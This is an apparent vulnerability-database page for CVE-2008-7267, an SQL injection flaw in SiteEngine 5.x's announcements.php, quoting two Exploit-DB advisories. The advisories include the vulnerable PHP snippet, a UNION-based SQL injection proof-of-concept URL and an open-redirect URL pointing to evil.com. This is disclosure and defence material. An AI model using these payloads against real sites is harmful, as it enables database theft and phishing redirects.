CVE-2008-7267
published 2010-12-01CVE-2008-7267: SQL injection vulnerability in announcements.php in SiteEngine 5.x allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.19%
63.9th percentile
SQL injection vulnerability in announcements.php in SiteEngine 5.x allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| boka | siteengine | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SiteEngine 5.x - Multiple Vulnerabilities
exploitdb·2008-10-23
CVE-2008-7267 SiteEngine 5.x - Multiple Vulnerabilities
SiteEngine 5.x - Multiple Vulnerabilities
---
SiteEngine 5.x Multiple Remote Vulnerabilities
Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.
-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";
POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
This vulnerability exist in board.php too……
-=0x02=- URI Redirection Vulnerability
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com
-=0x03=- Information Disclosure Vulnerability
POC:
htt
Exploit-DB
UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection
exploitdb·2008-10-23
CVE-2008-7267 UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection
UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection
---
source: https://www.securityfocus.com/bid/31889/info
SiteEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SiteEngine 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
No writeups or analysis indexed.
http://secunia.com/advisories/32404http://www.securityfocus.com/archive/1/497747/100/0/threadedhttp://www.securityfocus.com/bid/31889https://www.exploit-db.com/exploits/6823http://secunia.com/advisories/32404http://www.securityfocus.com/archive/1/497747/100/0/threadedhttp://www.securityfocus.com/bid/31889https://www.exploit-db.com/exploits/6823
2010-12-01
Published